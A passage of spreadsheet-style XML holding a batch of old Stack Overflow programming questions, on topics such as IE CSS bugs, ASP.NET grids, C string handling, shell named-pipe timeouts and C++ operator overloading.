task :task1, :roles =&amp;gt; :app do
  *code*
end
task :task2, :roles =&amp;gt; :app, :only =&amp;gt; {:primary =&amp;gt; true} do
  *code for just primary server*
end
task :task3, :roles =&amp;gt; :app do
  *more code*
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But even this doesn't seem to work (all three tasks get run on every server).&lt;/p&gt;
&lt;p&gt;I've been working on this on and off for a few days and I'm having no luck with my searches.  Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Superscript underline in IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm going to be brief because I'm short on time, so I apologize if this isn't as detailed as I'd like it to be.&lt;/p&gt;
&lt;p&gt;I have some code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;print("&amp;lt;a href='#'&amp;gt;Some text&amp;lt;sup&amp;gt;&amp;amp;reg;&amp;lt;/sup&amp;gt; some more text&amp;lt;/a&amp;gt;");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In FF, this works like I would like, the link as a whole is underlined. However in IE, the link is underlined except under the &amp;reg; where it looks like a symbol above a hyphen and is rather ridiculous looking. &lt;/p&gt;
&lt;p&gt;I've tried several suggestions I found on Google, but none of them are very helpful in achieving the desired effect. Adding a border to the bottom is not an option unfortunately. So far the best solution is to break the underline completely at the sup tag with CSS which still leaves it working fine in FF while still looking less silly in IE.&lt;/p&gt;
&lt;p&gt;If anyone could help with this it would be most appreciated, I'd rather not go through the site removing &lt;code&gt;&amp;lt;sup&amp;gt;&lt;/code&gt; tags as I've been told I will have to do should I not solve this dilemma. &lt;/p&gt;
&lt;p&gt;UPDATE: Went with the sup {"text-decoration:none" } solution, it'll do for now. There are reg marks everywhere, so the whole site would've had to have been updated, which was more trouble than it was worth we all decided. Thanks to those who replied.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Initialize multidimensional array</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt; Checkbox[,] checkArray = new Checkbox[2, 3]{{checkbox24,checkboxPref1,null},                                    {checkbox23,checkboxPref2,null}};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am getting error . How do I initialize it? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Equivalent of java's ConcurrentHashMap in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;is there anything?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert a string to RegularTimePeriod in java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Jfreechart. I have the code like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TimeSeries t1 = new TimeSeries("EUR/GBP");
t1.add(new Day(4, MonthConstants.JANUARY, 2001), new Double(1.5807));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I get &lt;code&gt;String&lt;/code&gt; from my SQL query. TimeSeries accepts only &lt;code&gt;RegularTimePeriod&lt;/code&gt; or &lt;code&gt;TimeSeriesDataItem&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Please let me know how to convert a &lt;code&gt;String&lt;/code&gt; into &lt;code&gt;RegularTimePeriod&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Thanks in Advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does IE7 when clearing a float result in a margin bug?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a very simple HTML page (validates as XHTML 1.0 Strict):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div class="news-result"&amp;gt;
    &amp;lt;h2&amp;gt;&amp;lt;a href="#"&amp;gt;Title&amp;lt;/a&amp;gt;&amp;lt;/h2&amp;gt;&amp;lt;span class="date"&amp;gt;(1-1-2009)&amp;lt;/span&amp;gt;
    &amp;lt;p&amp;gt;Some text...&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with the following CSS:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.news-result {
    overflow: hidden;
    padding: 30px 0 20px;
}
.news-result h2 {
    float: left;
    margin: 0 10px 0 0;
}
.news-result span.date {
    margin: 1px 0 0;
    float : left;
}
.news-result p {
    padding: 3px 0 0 0;
    clear: left;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Rendering this page in IE6 or FF3 render perfectly (the title and the date on a single line, followed by the paragraph). In IE7 however, there is a large space between the title and date, and the paragraph.&lt;/p&gt;
&lt;p&gt;We have a simple reset that clears every margin and padding on every element.&lt;/p&gt;
&lt;p&gt;Dropping the float on the date element fixes this problem, as does setting &lt;code&gt;zoom: 1&lt;/code&gt; on the paragraph or removing &lt;code&gt;overflow: hidden&lt;/code&gt; on the container, but all are not ideal. Why does a float followed by a paragraph trigger this additional top margin, only on IE7?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>python setup.py develop not updating easy_install.pth</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;According to &lt;a href="http://peak.telecommunity.com/DevCenter/setuptools#development-mode" rel="nofollow"&gt;setuptools&lt;/a&gt; documentation, setup.py develop is supposed to create the egg-link file and update easy_install.pth when installing into site-packages folder.  However, in my case it's only creating the egg-link file.  How does setuptools decide if it needs to update easy_install.pth?&lt;/p&gt;
&lt;p&gt;Some more info:
It works when I have setuptools 0.6c7 installed as a folder under site-packages.  But when I use setuptools 0.6c9 installed as a zipped egg, it does not work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to run custom actions during uninstall using InstallShield 2009</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to run a custom action during uninstallation of a ManagedCode which is a part of the installation (Before it is removed in the uninstall process)
Is it possible in Install Shield 2009?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find the caller of a method using stacktrace or reflection?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to find the caller of a method. Is it possible using stacktrace or reflection?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access Non-Public members of a GridViewCommandEventArgs object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a gridview on my aspx page set up the OnRowCommand event using a series of ASP.NET LinkButton object to handle the logic using the CommandName property.  I need to access the GridViewRow.RowIndex to retrieve values from the selected row and notice it is a non-public members of the GridViewCommandEventArgs object while debugging the application&lt;/p&gt;
&lt;p&gt;Is there a way I can access this property of is theere a better implementation?&lt;/p&gt;
&lt;p&gt;Here is my source code:&lt;/p&gt;
&lt;p&gt;aspx page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:GridView ID="MyGridView" runat="server" OnRowCommand="MyGirdView_OnRowCommand"&amp;gt;
    &amp;lt;Columns&amp;gt;
        &amp;lt;asp:TemplateField&amp;gt;
            &amp;lt;ItemTemplate&amp;gt;
                &amp;lt;asp:LinkButton 
                 id="MyLinkButton" 
                 runat="server" 
                 CommandName="MyCommand" 
                /&amp;gt;
            &amp;lt;/ItemTemplate&amp;gt;
        &amp;lt;/asp:TemplateField&amp;gt;
    &amp;lt;/Columns&amp;gt;
&amp;lt;/asp:GridView&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;code behind&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void MyGirdView_OnRowCommand(object sender, GridViewCommandEventArgs e)
{
    //need to access row index here....
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;b&gt;UPDATE:&lt;/b&gt;&lt;br /&gt;
@brendan - I got the following compilation error on the following line of code:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;"Cannot convert type
  'System.Web.UI.WebControls.GridViewCommandEventArgs'
  to
  'System.Web.UI.WebControls.LinkButton'"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre&gt;&lt;code&gt;LinkButton lb = (LinkButton) ((GridViewCommandEventArgs)e.CommandSource);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I slightly modified the code and the following solution worked:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LinkButton lb = e.CommandSource as LinkButton;
GridViewRow gvr = lb.Parent.Parent as GridViewRow;
int gvr = gvr.RowIndex;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What are some best practices to support multiple resolutions in a web application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are some best practices on enabling a web application to support multiple resolutions?  Specifically resolutions that are wide-screen vs. normal aspect ratio.&lt;/p&gt;
&lt;p&gt;It doesn't seem like there is an easy answer - other than simply supporting a few fixed resolutions and using some absolute positioning to get the layout to work correctly.&lt;/p&gt;
&lt;p&gt;This of course gets even more difficult to make it cross browser.&lt;/p&gt;
&lt;p&gt;Does anyone have any good resources of this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is endian conversion required for wchar_t data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In C/C++, if a multi-byte wide character (wchar_t) value is transmitted from a big-endian system to a little-endian system (or vice-versa), will it come out the same value on the other side?  Or will the bytes need to be swapped?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is a glossy or matte LCD screen better for long coding sessions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking at getting a new LCD monitor, but I'm concerned that a glossy monitor might cause more eye strain after a long day of work. I typically spend a lot of time in front of my monitor, so eye strain is definitely something I have thought about. Do you prefer the matte or glossy LCD screens and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you put a gradient background on ASP.NET menu items?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The boss wants the master page's menu to look nicer.  I generated my gradient file with one of the tools available on the net, no problem there..&lt;/p&gt;
&lt;p&gt;I tried to make a CSS class for each menu item but when I use the background-image directive and the style builder, I get a line like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;background-image: url('file:///C:/Documents and Settings/Username/My Documents/Visual Studio 2008/WebSites/ThisSite/Images/Gradient.png')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...when what I &lt;em&gt;want&lt;/em&gt; is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;background-image: url('~/Images/Gradient.png')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first url will, of course, only work when I'm debugging on my local machine - deploy this and I'm hosed.  So many other ASP.NET objects work with "~/" to indicate the top-level directory of the website but my css file doesn't like it and I can't set a background image for the menu control or the menu items - seems like a GLARING omission when I can do it to so many other controls.&lt;/p&gt;
&lt;p&gt;What am I missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>3ds max object to opengl</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to assemble a scene in opengl, using already made objects. The problem is that the object are in .max format and have no external textures. How could I import my objects in opengl, without retexturing them. I am thinking about exporting them to 3ds and using a 3ds file loader. Could you recommend one, and of course it has to work only with the 3ds file itself, no external texture files.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;3ds max already allows me to export the file to obj. I have an object that has no external texture file, but it is already fully colored as a 3ds file. Is there any way to import in opengl and have the same colors, for the trunk, leaves?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to copy a few chars from a char[] to a char* in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Yo!&lt;/p&gt;
&lt;p&gt;I'm trying to copy a few chars from a char[] to a char*. I just want the chars from index 6 to (message length - 9).&lt;/p&gt;
&lt;p&gt;Maybe the code example will explain my problem more:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char buffer[512] = "GET /testfile.htm HTTP/1.0";
char* filename; // I want *filename to hold only "/testfile.htm"
msgLen = recv(connecting_socket, buffer, 512, 0);
strncpy(filename, buffer+5, msgLen-9);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any response would help alot!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XML Deserialization - convert attribute value into class automatically (.net)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;(vb.net/c#/etc)&lt;/p&gt;
&lt;p&gt;I am having trouble figuring out how to do a bit of deserialization magic.  Currently the standard deserialization works fine, including the enums, but &lt;em&gt;now&lt;/em&gt; I want to convert an attribute into a class.  Oh! what was I &lt;em&gt;thinking&lt;/em&gt;!&lt;/p&gt;
&lt;p&gt;My xml looks a bit like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;....
&amp;lt;review user="..." version="2.2"&amp;gt;...&amp;lt;/review&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And this for my property/class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[XmlAttribute("version")]
public MyVersion Version { get; set; }
class MyVersion  {
    // equality overloaded
    // can ctype() from string to MyVersion
    // constructor that takes a single string, etc
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I help the serializer along, so that it can automatically deserialize my string property into this class?  Do I need to modify the MyVersion class in some way, or change the definition of the property?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I do &lt;strong&gt;not&lt;/strong&gt; want to have to override any methods like OnDeserialized, etc.  It is not worth it for this project.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If this can't be done with the default xml deserializer, then that would be good enough to know.  There are lots of things it isn't good for, so I won't be surprised.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Implementing sort/page feature when using POCOs with ASP.net Data Controls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am not a big fan of datasets so I use POCO to return data. I have achieved paging and sorting using custom methods that I create for a POCO type that work on page size and give me a set of the complete POCO collection at a time, I use methods that check for name of the DataItem clicked and sort order to do that sort. Creating such methods over and over for every POCO that you plan to use with an ASP.net data control like Gridview is pretty painful.&lt;/p&gt;
&lt;p&gt;Is there a technique to automate this so that I do not need to make such methods every time for a new POCO so that it works as if you were using a DataTable? I can provide some more explanation if required.&lt;/p&gt;
&lt;p&gt;NOTE: Some people may call POCO as DTOs .&lt;/p&gt;
&lt;p&gt;EDIT : I found this &lt;a href="http://geekswithblogs.net/czumbano/archive/2006/03/27/73532.aspx" rel="nofollow"&gt;article&lt;/a&gt; on this topic. Is this the only possible way to get to what i am trying to do??&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Capture characters from standard input without waiting for enter to be pressed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can never remember how I do this because it comes up so infrequently for me. But in C or C++, what is the best way to read a character from standard input without waiting for a newline (press enter).&lt;/p&gt;
&lt;p&gt;Also ideally it wouldn't echo the input character to the screen. I just want to capture keystrokes with out effecting the console screen.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you keep your build tools in version control?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you keep tools that are necessary to build your project under version control?&lt;/p&gt;
&lt;p&gt;If you do, what are your guidelines for which tools to include? I guess noone puts Visual Studio in version control, but how about your unit-test-runner? The Nant/Ant/Maven executable?&lt;/p&gt;
&lt;p&gt;How about external dependencies? Do you have Boost in version control? The JDK? NUnit/JUnit? Where do you draw the limit here?&lt;/p&gt;
&lt;p&gt;(See also &lt;a href="http://stackoverflow.com/questions/191533/svn-and-binaries"&gt;this question&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;
I guess my question was not completely clear: I did not want to know whether you kept them in version control vs. or some shared drive. I really wanted to know whether you checked the tools necessary for building a project into version control &lt;em&gt;together&lt;/em&gt; with the project, so that when you checked the project out, you would automatically get the tools.&lt;/p&gt;
&lt;p&gt;As a general follow-up to those who answer no: what is your process for keeping track of those tools? Do your script download them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What Are the Pros and Cons of Filemaker?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A potential customer has asked me to look at some promotional flyers for a couple of apps which fall into the contact management / scheduler category.  Both use Filemaker as their backend.  It looks like these two apps are sold as web apps.  At any rate I had not heard of Filemaker in about ten years, so it was surprising to see it pop up twice in the same sitting.  I think it started out as a Mac platform db system.&lt;/p&gt;
&lt;p&gt;I am more partial to SQL Server, MY SQL, etc, but before make any comments on Filemaker, I'd like to know some of the pros and cons of the system.  It must be  more than Access for Mac's, but I have never run across it as a player in the client / server or web app arena.&lt;/p&gt;
&lt;p&gt;Many thanks
Mike Thomas&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Datagrid - hiding a specific row/column</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a Datagrid with several columns of data (call it myDG) and one of these columns is a DateTime bound to a datasource. Its value is dependent on a "job" object completing a job and assigning the date time value. Since this normally takes up to a minute the value is left unassigned at the beginning.&lt;/p&gt;
&lt;p&gt;The column's asp.net definition is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:boundcolumn 
  DataField="CompletedDate" 
  HeaderText="Date Completed" 
  DataFormatString="{0:dd-MMM-yyyy &amp;lt;br&amp;gt; hh:mm:ss tt}" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So the functionality works fine when the "job" has completed and it sets the time. But before that, while the row is being displayed, it shows as&lt;/p&gt;
&lt;p&gt;01-Jan-0001 
12:00:00 AM&lt;/p&gt;
&lt;p&gt;I am wanting to hide this and determined that the best way would be to mask that particular row and column with a blank, or override the value temporarily. I am having problems doing this and finding a way to access that specific row and column.&lt;/p&gt;
&lt;p&gt;It is the [3] column of the datagrid and always in the first row (since new rows are added at the top).&lt;/p&gt;
&lt;p&gt;Is there a way to directly access this cell and temporarily 'hide' its contents, or mask them?  Ideally it would be great if there was a way to blank out all rows that had a value equal to this in their column, but a way to manipulate the specific cell would work as well.&lt;/p&gt;
&lt;p&gt;-thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In C# check that filename is *possibly* valid (not that it exists)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a method in the System.IO namespace that checks the validity of a filename?&lt;/p&gt;
&lt;p&gt;For example, &lt;code&gt;C:\foo\bar&lt;/code&gt; would validate and &lt;code&gt;:"~-*&lt;/code&gt; would not&lt;/p&gt;
&lt;p&gt;Or a little trickier, &lt;code&gt;X:\foo\bar&lt;/code&gt; would validate is there is an &lt;code&gt;X:&lt;/code&gt; drive on the system, but wouldn't otherwise.&lt;/p&gt;
&lt;p&gt;I suppose I could write such a method myself, but I'm more interested in a built-in one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to access the user profile in a Django template?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm storing some additional per-user information using the &lt;a href="http://docs.djangoproject.com/en/dev/topics/auth/#storing-additional-information-about-users"&gt;&lt;code&gt;AUTH_PROFILE_MODULE&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We can access the user in a Django template using &lt;code&gt;{{ request.user }}&lt;/code&gt; but how do we access fields in the profile since the profile is only accessible via a function &lt;code&gt;user.get_profile()&lt;/code&gt; ?&lt;/p&gt;
&lt;p&gt;Is it really required to explicitly pass the profile into the template every time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I include a CDATA section in a ConfigurationElement?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the .NET Fx 3.5 and have written my own configuration classes which inherit from ConfigurationSection/ConfigurationElement.  Currently I end up with something that looks like this in my configuration file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;blah.mail&amp;gt;
    &amp;lt;templates&amp;gt;
        &amp;lt;add name="TemplateNbr1" subject="..." body="Hi!\r\nThis is a test.\r\n."&amp;gt;
            &amp;lt;from address="blah@hotmail.com" /&amp;gt;
        &amp;lt;/add&amp;gt;
    &amp;lt;/templates&amp;gt;
&amp;lt;/blah.mail&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to be able to express the body as a child node of &lt;code&gt;template&lt;/code&gt; (which is the &lt;code&gt;add&lt;/code&gt; node in the example above) to end up with something that looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;blah.mail&amp;gt;
    &amp;lt;templates&amp;gt;
        &amp;lt;add name="TemplateNbr1" subject="..."&amp;gt;
            &amp;lt;from address="blah@hotmail.com" /&amp;gt;
            &amp;lt;body&amp;gt;&amp;lt;![CDATA[Hi!
This is a test.
]]&amp;gt;&amp;lt;/body&amp;gt;
        &amp;lt;/add&amp;gt;
    &amp;lt;/templates&amp;gt;
&amp;lt;/blah.mail&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Php Framework or template engine or something else?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a relatively simple application up and working with some basic functionality which i have built as a bit of a project. I would like to now build on that, and add some more complex features, including login.&lt;/p&gt;
&lt;p&gt;The code has got quite complex, and it's written in plain php, so all the presentation code is mixed in with the logic.  I have decided that before I go any further I'd like to re factor it to separate this out, so it's easier to maintain and add to. I've been researching MVC and think that's the way i should be going.&lt;/p&gt;
&lt;p&gt;I had decided to give the zend framework a go, and have spent a while trying to get to grips with it, however I have found the learning curve extremely steep as I have no object oriented experience.&lt;/p&gt;
&lt;p&gt;Is there another framework or option that anyone could recommend? I am considering having a look at cake based on reading other posts in this forum but I'd accept any guidance - my "requirments" are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;easiest to learn for non OO experience&lt;/li&gt;
&lt;li&gt;includes some login / authentication features&lt;/li&gt;
&lt;li&gt;handles database interaction with mysql easily.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All suggestions appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Difference between DBEngine.BeginTrans and DBEngine.Workspaces(0).BeginTrans</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Access, what is the difference between these two statements?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DBEngine.BeginTrans
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DBEngine.Workspaces(0).BeginTrans
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The documentation for both leads to the same place.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Factories in Presenters in a Model View Presenter and Domain Driven Design Project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In domain driven design, it appears to be a good practice to use Factories to create your domain objects in your domain layer (as opposed to using a direct constructor or IoC). &lt;/p&gt;
&lt;p&gt;But what about using the domain object factories in a presenter layer. For instance, say that I was creating a domain object from user input obtained from the presenter. &lt;/p&gt;
&lt;p&gt;Here's an example, say I have a Configuration domain object that has a number of decimal settings.&lt;/p&gt;
&lt;p&gt;public class Configuration : PersistantObject
{&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; public decimal temperature {get;set;}
 ...(times 20)
 public decimal gravity {get;set;}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
&lt;p&gt;In order to create this object in the domain layer, rather than the presenter layer, I would have to pass each of these decimal values as function parameters.  Creating an unwieldy function definition and call.&lt;/p&gt;
&lt;p&gt;ie ConfigurationService.CreateConfiguration(temperature, ...(x20), gravity);&lt;/p&gt;
&lt;p&gt;The perhaps better solution would be to create the Configuration object in the presenter layer, and assign all the values of the configuration object directly from the user input, skipping a lengthy function call.&lt;/p&gt;
&lt;p&gt;Configuration config = ConfigurationFactory.CreateNewConfiguration();&lt;/p&gt;
&lt;p&gt;config.temperature  = temperature;&lt;/p&gt;
&lt;p&gt;..(x20).. = ...;&lt;/p&gt;
&lt;p&gt;config.gravity = gravity;&lt;/p&gt;
&lt;p&gt;ConfigurationService.SaveNewConfiguration(config);&lt;/p&gt;
&lt;p&gt;But I'm wondering if this approach is wrong and why?
If both of these approaches are wrong, what is the best approach for creating a lengthy object from user input and why?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>write to fifo/pipe from shell, with timeout</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a pair of shell programs that talk over a named pipe. The reader creates the pipe when it starts, and removes it when it exits.&lt;/p&gt;
&lt;p&gt;Sometimes, the writer will attempt to write to the pipe between the time that the reader stops reading and the time that it removes the pipe.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;reader: while condition; do read data &amp;lt;$PIPE; do_stuff; done
writer: echo $data &amp;gt;&amp;gt;$PIPE
reader: rm $PIPE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;when this happens, the writer will hang forever trying to open the pipe for writing.&lt;/p&gt;
&lt;p&gt;Is there a &lt;strong&gt;clean&lt;/strong&gt; way to give it a timeout, so that it won't stay hung until killed manually? I know I can do&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/sh
# timed_write &amp;lt;timeout&amp;gt; &amp;lt;file&amp;gt; &amp;lt;args&amp;gt;
# like "echo &amp;lt;args&amp;gt; &amp;gt;&amp;gt; &amp;lt;file&amp;gt;" with a timeout
TIMEOUT=$1
shift;
FILENAME=$1
shift;
PID=$$
(X=0; # don't do "sleep $TIMEOUT", the "kill %1" doesn't kill the sleep
 while [ "$X" -lt "$TIMEOUT" ];
 do sleep 1; X=$(expr $X + 1);
 done; kill $PID) &amp;amp;
echo "$@" &amp;gt;&amp;gt;$FILENAME
kill %1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this is kind of icky. Is there a shell builtin or command to do this more cleanly (without breaking out the C compiler)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Canonical operator overloading?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a canonical or recommended pattern for implementing arithmetic operator overloading in C++ number-like classes?&lt;/p&gt;
&lt;p&gt;From the C++ FAQ, we have an exception-safe assignment operator that avoids most problems:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class NumberImpl;
class Number {
   NumberImpl *Impl;
   ...
};
Number&amp;amp; Number::operator=(const Number &amp;amp;rhs)
{
   NumberImpl* tmp = new NumberImpl(*rhs.Impl);
   delete Impl;
   Impl = tmp;
   return *this;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But for other operators (+, +=, etc..) very little advice is given other than to make them behave like the operators on built-in types.&lt;/p&gt;
&lt;p&gt;Is there a standard way of defining these?  This is what I've come up with - are there pitfalls I'm not seeing?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Member operator
Number&amp;amp; Number::operator+= (const Number &amp;amp;rhs)
{
    Impl-&amp;gt;Value += rhs.Impl-&amp;gt;Value; // Obviously this is more complicated
    return *this;
}
// Non-member non-friend addition operator
Number operator+(Number lhs, const Number &amp;amp;rhs)
{
     return lhs += rhs;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do you debug app crash with no stack trace referencing source code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://support.microsoft.com/kb/953102" rel="nofollow"&gt;http://support.microsoft.com/kb/953102&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;We spent about 50 hours during Christmas holiday to identify this problem, causing our business critical production app to crash randomly.&lt;/p&gt;
&lt;p&gt;The problem was that there was no stack trace to the source code, only native code like NativeWindow.Callback on the bottom of the stack trace.&lt;/p&gt;
&lt;p&gt;Any tools out there that you would have used to debug this kind of problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Structure of a C++ Object in Memory Vs a Struct</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have a class as follows&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   class Example_Class 
   {
       private:
         int x; 
         int y; 
       public: 
         Example_Class() 
         { 
             x = 8;
             y = 9;
         }
       ~Example_Class() 
       { } 
   };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And a struct as follows&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct
{
   int x;
   int y;
} example_struct;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is the structure in memory of the  &lt;code&gt;example_struct&lt;/code&gt; simmilar to that in &lt;code&gt;Example_Class&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;for example if I do the following&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct example_struct foo_struct;
Example_Class foo_class = Example_Class();
memcpy(&amp;amp;foo_struct, &amp;amp;foo_class, sizeof(foo_struct));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;will &lt;code&gt;foo_struct.x = 8&lt;/code&gt; and &lt;code&gt;foo_struct.y = 9&lt;/code&gt; (ie: the same values as the x,y values in the foo_class) ?&lt;/p&gt;
&lt;p&gt;The reason I ask is I have a C++ library (don't want to change it) that is sharing an object with C code and I want to use a struct to represent the object coming from the C++ library. I'm only interested in the attributes of the object.&lt;/p&gt;
&lt;p&gt;I know the ideal situation would be to have Example_class wrap arround a common structure between the C and C++ code but it is not going to be easy to change the C++ library in use.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to convert string to binary integer file using command line under linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What i want is to take an integer represented as a string, for example "1234", and convert it to a file called int, containing a 32-bit big endian integer, with the value 1234.&lt;/p&gt;
&lt;p&gt;The only way I have figured out to do this is something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo 1234 | awk '{printf "0: %08X", $1}' | xxd -r &amp;gt; int
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which is a bit nasty!&lt;/p&gt;
&lt;p&gt;Does anyone know a better way?&lt;/p&gt;
</t>
  </si>
  <si>
